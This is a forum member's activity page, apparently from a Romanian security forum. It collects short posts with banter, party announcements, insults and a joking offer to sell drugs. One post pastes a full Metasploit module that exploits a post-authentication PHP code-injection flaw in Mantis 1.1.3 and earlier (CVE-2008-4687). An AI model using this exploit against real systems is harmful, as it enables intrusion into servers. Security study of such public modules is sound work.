Jump to content

KRONZY94

Members
 View Profile  See their activity

  • Posts

    40

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by KRONZY94

  1. KRONZY94
    =)))))))))))))))))))))))))))))))
  2. KRONZY94
    @Nytro
  3. KRONZY94
    Salut. Azi e ziua lu' @kasmir Va asteptam la party pe : https://discord.gg/34Dx9ct De la 20:00 facem show! Organizatori: KronzyBeleaua Dan Farmacie Ben Supremu j1ll2013 Reincarnatu WormValoare Vladutz Saracu Aismen Dintosu Maria Muii gratis la toata lumea! Sarbatorit: @kasmir Invitati Speciali: Florin Salam Dani Mocanu Tzanca Uraganu Leo de la Kuweit ---------------------------------------------------------------------------------------- FREE ENTRY AND MUY LA ALL LUME.
  4. KRONZY94
    bayetzy mey sunt hall of fame sy yty luam mortyn pl! @WormValoare2018 @coaiemari
  5. KRONZY94

    Salutare RST

    KRONZY94 replied to dpul's topic in Bine ai venit

    Trader😂😂 ești 100% un spammer jegos, PACE!
  6. KRONZY94
    Propun sa ne dai numarul lu ma-ta si sa ii dam spam tot forumu. Vrei sa iti faci DB cu numere de telefon? Iesi in pula mea de fraier cu site-ul tau si nu mai face atat spam.
  7. KRONZY94
    l'am raportat poate da si ei ceva
  8. KRONZY94
    Salut, Iti propun sa schimbi dealer-ul. Poti sa vi la mine, ma faci pe mine cu bani nu pe altu Iti fac reducere, Speish,Has,Maria ce vrea pula ta Iti aduc si coca pe comanda
  9. KRONZY94

    Fun stuff

    KRONZY94 replied to Wisa's topic in Discutii non-IT

    e deja putrezit!
  10. KRONZY94
    raportat.
  11. KRONZY94

    Fun stuff

    KRONZY94 replied to Wisa's topic in Discutii non-IT

    faceti research pe keyword "sinucidere" poate il gasim pe gecko! @Nytro sti ceva si nu vrei sa ne spui ?
  12. KRONZY94
    am spart efibyay si nasa sy myau spart maskaty kasa
  13. KRONZY94
    cf cumetre, imi da sclavi astia down vote la afis
  14. KRONZY94
    DISCORD : https://discord.gg/34Dx9ct ORGANIZATORI : DAN FARMACIE KRONZY INTERGALACTICU AISMEN DINTOSU BEN SIMPATICU IONUTZ SUPREMU J1LL EXPIRATU WORM VALOARE VLAD DIJEIU CURVE PREZENTE : MARIA6 VA ASTEPTAM PE DISCORD IN NUMAR CAT MAI MARE !
  15. KRONZY94
    Nu uita de pateu !😂😂😂
  16. KRONZY94
    Nu ne strica sărăcia !
  17. KRONZY94
    =))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  18. KRONZY94
    Ma pis pe tine cu tot cu -rep-urile tale Crezi ca ma afecteaza? Off, ma duc sa plang la Nytro ca mi-ai dat -rep la toate posturile
  19. KRONZY94
    @Nytro
  20. KRONZY94
    https://nicevps.net/ eu am de aici unu.
  21. KRONZY94
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Mantis manage_proj_page PHP Code Execution', 'Description' => %q{ Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote Code Execution vulnerability in the sort parameter of the manage_proj_page.php page. }, 'Author' => [ 'EgiX', # Exploit-DB Entry Author 'Lars Sorenson' # MSF module author ], 'License' => MSF_LICENSE, 'References' => [ ['EDB', '6768'], ['CVE', '2008-4687'], ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Mantis <= 1.1.3', { } ], ], 'DisclosureDate' => 'Oct 16, 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']), OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']), OptString.new('PASSWORD', [true, 'The password to log in with', 'root']), ]) end def check vprint_status('Checking Mantis version ...') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'login_page.php'), 'method' => 'GET' }) unless res vprint_error('Connection to host failed!') return CheckCode::Unknown end unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/ vprint_error('Cannot determine Mantis version!') return CheckCode::Unknown end version = Gem::Version.new(Regexp.last_match[1]) vprint_status("Mantis version #{version} detected") if res.code == 200 && version <= Gem::Version.new('1.1.3') return CheckCode::Appears end CheckCode::Safe end def login vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login_page.php'), }) unless res fail_with(Failure::Unreachable, 'Cannot access host to log in!') end res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'login.php'), 'method' => 'POST', 'vars_post' => { 'username': datastore['username'], 'password': datastore['password'], }, 'cookie'=> "PHPSESSID=#{res.get_cookies}" }) unless res fail_with(Failure::Unknown, 'Cannot access host to log in!') end fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302 fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php') store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) res.get_cookies end def exploit fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears cookie = login vprint_status('Sending payload ...') payload_b64 = Rex::Text.encode_base64(payload.encoded) data = { 'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#", } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'), 'method' => 'POST', 'vars_post' => data, 'headers' => { 'Connection': 'close', 'Cookie': cookie.to_s, 'Cmd': payload_b64 } }) end end
  22. KRONZY94
  23. KRONZY94
    Nu zici rău
  24. KRONZY94
    Mersi.
  25. KRONZY94
    self.
×
×
  • Create New...